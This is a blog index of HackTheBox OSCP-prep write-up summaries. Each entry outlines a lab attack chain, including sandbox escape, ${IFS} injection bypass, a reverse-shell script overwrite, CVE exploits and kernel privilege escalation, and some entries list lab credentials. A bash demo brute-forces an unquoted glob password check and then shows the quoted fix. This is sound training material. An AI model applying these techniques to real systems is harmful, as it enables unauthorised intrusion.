HTB: Codify - OSCP Prep Write-up

Sandboxes are only as strong as their implementation. Codify gives you a Node.js code editor to play with - and a vm2 version that plays right back.

Machine info: Name Codify, Platform HackTheBox, OS Linux, Difficulty Easy.

TL;DR:
- The web app runs Node.js snippets in a vm2 sandbox; child_process is blocked, but a vm2 context escape lets you break out entirely.
- Shell as svc; linpeas finds a SQLite database with a bcrypt hash for joshua, cracked with John and rockyou.
- SSH as joshua; sudo -l shows /opt/scripts/mysql-backup.sh runnable as root. The script compares passwords with an unquoted [[ $DB_PASS == $USER_PASS ]], so the user-supplied side is treated as a glob pattern, which enables character-by-character password brute-forcing.
- Alternatively, compile and run the dirtyfrag LPE directly as svc and skip joshua entirely.

Recon - Nmap: nmap -sV -sC -Pn -A codify.htb ...

May 15, 2026 · 4 min · João Vítor Bonin
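The unquoted comparison behind the Codify privesc is worth seeing in isolation. The bash harness below is an added example, not the machine's backup script or the author's exploit: it reproduces the vulnerable [[ $DB_PASS == $USER_PASS ]] check against a constructed secret, recovers that secret one character at a time by sending glob patterns, and shows the quoted form that closes the hole. The secret value, the function names and the candidate charset are assumptions made for the demo.

```bash
#!/usr/bin/env bash
# Added example: local model of the unquoted-comparison weakness.
# In [[ ... ]], an unquoted right-hand operand is a pattern, not a string,
# so "k*" matches any password that starts with "k".

# Constructed secret for the demo; the real password is not on this page.
DB_PASS='kljh12k3jhaskjh12kjh3'

# Simulates the vulnerable check: returns 0 on (pattern) match, 1 otherwise.
vuln_check() {
    local USER_PASS="$1"
    if [[ $DB_PASS == $USER_PASS ]]; then   # unquoted RHS -> glob match
        return 0
    fi
    return 1
}

# Hardened form: quoting the right-hand side forces a literal comparison.
safe_check() {
    local USER_PASS="$1"
    [[ $DB_PASS == "$USER_PASS" ]]
}

# Recover the secret against vuln_check, assuming it uses only [A-Za-z0-9].
# Each probe is "<known prefix><candidate char>*"; when no candidate extends
# the prefix, the prefix is the whole password.
brute_force() {
    local charset='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    local found='' c extended i
    while :; do
        extended=0
        for (( i = 0; i < ${#charset}; i++ )); do
            c=${charset:i:1}
            if vuln_check "${found}${c}*"; then
                found+="$c"
                extended=1
                break
            fi
        done
        (( extended )) || break
    done
    printf '%s\n' "$found"
}

# Stand-alone run: recover the secret and show that the quoted check is not fooled.
recovered=$(brute_force)
echo "recovered via glob probes: $recovered"
if safe_check 'k*'; then
    echo "quoted comparison: still matched (unexpected)"
else
    echo "quoted comparison: 'k*' rejected, literal match required"
fi
```

Each probe costs at most one comparison per candidate character, so the cost is linear in password length times charset size instead of exponential. The harness stops early if the secret contains characters outside the charset, and it does not escape glob metacharacters that might appear in the secret itself; on the real box every probe is one invocation of the sudo script, which is what makes the unquoted test exploitable rather than merely sloppy.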

HTB: CozyHosting - OSCP Prep Write-up

Error pages usually get ignored. On CozyHosting, the /error page is what gives the whole game away.

Machine info: Name CozyHosting, Platform HackTheBox, OS Linux, Difficulty Easy.

TL;DR:
- A Spring Boot Whitelabel Error page reveals the framework; a targeted wordlist uncovers /actuator/sessions leaking a valid session token.
- Swapping that cookie into /admin exposes an SSH connection form; the username field is injectable but blocks spaces, bypassed with ${IFS}.
- The shell lands as app; a .jar in /app contains application.properties with PostgreSQL credentials.
- Crack the bcrypt admin hash with John, su to josh, find sudo /usr/bin/ssh *, and use the GTFOBins ProxyCommand trick to get root.

Recon - Nmap: nmap -sV -sC -Pn -A cozyhosting.htb ...

May 15, 2026 · 4 min · João Vítor Bonin

HTB: Bashed - OSCP Prep Write-up

Bashed is a good reminder that developers are the best pentesters' allies - a web shell left in /dev does most of the work for you, and the path to root runs through a misconfigured sudo and a predictable job.

Machine info: Name Bashed, Platform HackTheBox, OS Linux, Difficulty Easy.

TL;DR:
- FeroxBuster finds a /dev directory hosting phpbash.php, an interactive PHP web shell.
- Shell as www-data; sudo -l reveals we can run anything as scriptmanager without a password.
- A job runs /scripts/test.py as root; overwrite it with a reverse shell payload to escalate.

Recon - Nmap: nmap -sV -sC -Pn -A 10.129.0.0 ...

April 21, 2026 · 2 min · João Vítor Bonin

HTB: BoardLight - OSCP Prep Write-up

BoardLight chains together a few classic techniques: subdomain discovery leading to an exposed ERP, authenticated RCE via a known CVE, credential reuse to pivot to a real user, and a SUID binary chain to root.

Machine info: Name BoardLight, Platform HackTheBox, OS Linux, Difficulty Easy.

TL;DR:
- Subdomain enumeration reveals crm.board.htb running Dolibarr 17.0.0.
- Default admin:admin credentials get us in.
- CVE-2023-30253, PHP code injection via the website module, gives a shell as www-data.
- Database credentials in conf.php are reused by user larissa for SSH.
- CVE-2022-37706, an Enlightenment SUID LPE, escalates to root.

Recon - Nmap: nmap -sV -sC -Pn -A 10.129.0.0 ...

April 21, 2026 · 3 min · João Vítor Bonin

HTB: Analytics - OSCP Prep Write-up

Next up: Analytics, an Easy Linux box. Pre-auth RCE on Metabase, a move from the Docker container to the host via credentials leaked in environment variables, and a kernel exploit chain for root.

Machine info: Name Analytics, Platform HackTheBox, OS Linux, Difficulty Easy.

TL;DR:
- Metabase 0.46.6 is vulnerable to pre-auth RCE (CVE-2023-38646).
- The initial shell lands inside a Docker container.
- Environment variables leak SSH credentials (metalytics:An4lytics_ds20223#).
- SSH to the host as metalytics, then the overlayfs kernel exploit chain CVE-2023-2640 + CVE-2023-32629 for root.

Recon - RustScan + Nmap: rustscan -a 10.129.21.240 -- -sV -sC -Pn -A ...

April 20, 2026 · 4 min · João Vítor Bonin

HTB: Nibbles - OSCP Prep Write-up

Another one down from the Lain Kusanagi list - this time it's Nibbles, an Easy Linux box. Classic web enumeration into authenticated RCE, with a clean sudo privesc to wrap it up.

Machine info: Name Nibbles, Platform HackTheBox, OS Linux, Difficulty Easy.

TL;DR:
- Nibbleblog v4.0.3 with default credentials (admin:nibbles).
- Authenticated file upload RCE (CVE-2015-6967) for an initial shell as nibbler.
- sudo -l reveals monitor.sh can be run as root with NOPASSWD.
- Overwrite monitor.sh with a payload that sets the SUID bit on /bin/bash, then run it to get root.

Recon - RustScan + Nmap: rustscan -a 10.129.20.162 -- -sV -sC -Pn -A ...

April 17, 2026 · 3 min · João Vítor Bonin

HTB: Sea - OSCP Prep Write-up

Why this post exists

This is the first in a series of write-ups I'm publishing as part of my OSCP preparation. The strategy is to follow the Lain Kusanagi curated list (a fork/evolution of the classic TJNull list), which selects HackTheBox machines with attack vectors and exploitation patterns similar to those found in the exam.

The goal of these posts is not just to document the solution, but to consolidate what I've learned: each write-up is structured as a condensed pentest report - recon, enumeration, foothold, privesc and takeaways - in the same format OffSec expects in the exam. ...

April 16, 2026 · 6 min · João Vítor Bonin